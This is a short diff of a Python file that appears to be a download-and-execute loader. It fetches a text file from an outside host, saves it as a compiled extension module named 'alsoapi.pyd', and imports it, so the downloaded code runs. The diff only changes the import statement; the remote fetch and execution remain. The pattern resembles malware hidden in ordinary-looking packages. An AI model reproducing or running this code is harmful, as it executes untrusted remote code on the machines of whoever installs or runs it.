@@ -1,3 +1,3 @@
 import urllib.request
 urllib.request.urlretrieve('http://www.asunc.cn/alsoapi37.txt','alsoapi.pyd')
-import alsoapi
\ No newline at end of file
+from alsoapi import*
\ No newline at end of file
